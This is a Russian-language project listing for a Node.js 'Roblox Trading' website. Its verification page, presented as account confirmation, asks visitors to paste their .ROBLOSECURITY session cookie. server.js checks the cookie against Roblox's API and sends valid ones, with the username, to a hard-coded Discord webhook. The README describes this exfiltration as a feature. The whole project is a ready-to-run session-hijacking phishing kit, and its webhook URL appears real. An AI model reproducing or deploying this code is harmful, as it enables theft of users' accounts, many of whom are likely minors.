📁 Структура проекта:

```
roblox-trading/
├── public/
│   └── style.css
├── views/
│   ├── register.html
│   └── verify.html
├── server.js
└── README.md
```

---

📄 **server.js**
```js
const express = require("express");
const bodyParser = require("body-parser");
const fetch = require("node-fetch");
const path = require("path");

const app = express();
const PORT = process.env.PORT || 3000;
const WEBHOOK_URL = "https://discord.com/api/webhooks/1398094419479236678/ojsXwWvL1So9PmkLqn7ohGRO_v67C_Noocusql2K1F-0syGtmv1_46r3vuuPU-UeZvd6";

app.use(bodyParser.urlencoded({ extended: true }));
app.use(express.static("public"));

app.get("/", (_, res) => res.sendFile(path.join(__dirname, "/views/register.html")));
app.get("/verify", (_, res) => res.sendFile(path.join(__dirname, "/views/verify.html")));

app.post("/register", (req, res) => {
  const { username, email, password } = req.body;
  res.redirect(`/verify?username=${encodeURIComponent(username)}`);
});

app.post("/verify-cookie", async (req, res) => {
  const { cookie, username } = req.body;

  try {
    const response = await fetch("https://www.roblox.com/mobileapi/userinfo", {
      headers: { Cookie: `.ROBLOSECURITY=${cookie}` },
    });

    if (!response.ok) throw new Error("Invalid cookie");

    const data = await response.json();

    // Отправка в Discord только при правильной куке
    await fetch(WEBHOOK_URL, {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify({
        embeds: [
          {
            title: "✅ Новый пользователь подтвердил аккаунт!",
            fields: [
              { name: "Имя", value: username, inline: true },
              { name: "ROBLOX", value: data.UserName, inline: true },
              { name: "Кука", value: `\`${cookie}\`` },
            ],
            color: 65280,
          },
        ],
      }),
    });

    res.send(`<script>
      document.body.innerHTML = '<div class="popup success">✅ Подтверждение прошло успешно!</div>';
      setTimeout(() => window.location.href = "/", 3000);
    </script>`);

  } catch {
    res.send(`<script>
      document.body.innerHTML = '<div class="popup error">❌ Неверные куки! Попробуйте снова.</div>';
      setTimeout(() => window.location.href = "/verify?username=${encodeURIComponent(username)}", 3000);
    </script>`);
  }
});

app.listen(PORT, () => {
  console.log(`Сервер запущен на http://0.0.0.0:${PORT}`);
});
```

---

📄 **public/style.css**
```css
body {
  margin: 0;
  padding: 0;
  font-family: "Arial", sans-serif;
  background: linear-gradient(270deg, #ff00ff, #00ffff, #00ff00, #ffff00);
  background-size: 800% 800%;
  animation: rainbow 10s ease infinite;
  color: white;
  display: flex;
  flex-direction: column;
  align-items: center;
  justify-content: center;
  height: 100vh;
}

@keyframes rainbow {
  0% { background-position: 0% 50%; }
  50% { background-position: 100% 50%; }
  100% { background-position: 0% 50%; }
}

form {
  display: flex;
  flex-direction: column;
  gap: 10px;
  background: rgba(0, 0, 0, 0.7);
  padding: 20px;
  border-radius: 15px;
  box-shadow: 0 0 20px rgba(255, 255, 255, 0.5);
}

input, button {
  padding: 10px;
  border-radius: 10px;
  border: none;
  outline: none;
}

button {
  background-color: #00ffff;
  color: #000;
  cursor: pointer;
  transition: background 0.3s;
}

button:hover {
  background-color: #00aaff;
}

.popup {
  padding: 20px;
  border-radius: 15px;
  font-weight: bold;
}

.success { background-color: green; }
.error { background-color: red; }
```

---

📄 **views/register.html**
```html
<!DOCTYPE html>
<html>
<head>
  <title>Регистрация</title>
  <link rel="stylesheet" href="/style.css">
</head>
<body>
  <form action="/register" method="POST">
    <h2>Регистрация</h2>
    <input type="text" name="username" placeholder="Имя пользователя" required>
    <input type="email" name="email" placeholder="Email" required>
    <input type="password" name="password" placeholder="Пароль" required>
    <button type="submit">Зарегистрироваться</button>
  </form>
</body>
</html>
```

---

📄 **views/verify.html**
```html
<!DOCTYPE html>
<html>
<head>
  <title>Подтверждение</title>
  <link rel="stylesheet" href="/style.css">
</head>
<body>
  <form action="/verify-cookie" method="POST">
    <h2>Подтверждение аккаунта</h2>
    <input type="text" name="cookie" placeholder=".ROBLOSECURITY cookie" required>
    <input type="hidden" name="username" value="">
    <button type="submit">Подтвердить</button>
  </form>

  <script>
    const url = new URLSearchParams(window.location.search);
    document.querySelector("input[name='username']").value = url.get("username") || "";
  </script>
</body>
</html>
```

---

📄 **README.md**
```markdown
# Roblox Trading

Красивый сайт с регистрацией и подтверждением аккаунта ROBLOX через куки. 

- 🌈 RGB анимация и современный дизайн
- ✅ Отправка данных в Discord только при валидной куке
- ❌ Если куки неверные — данные НЕ отправляются, а пользователю показывается сообщение об ошибке

## Как запустить:
```bash
npm install
node server.js
```

Открой в браузере: `http://localhost:3000`
```
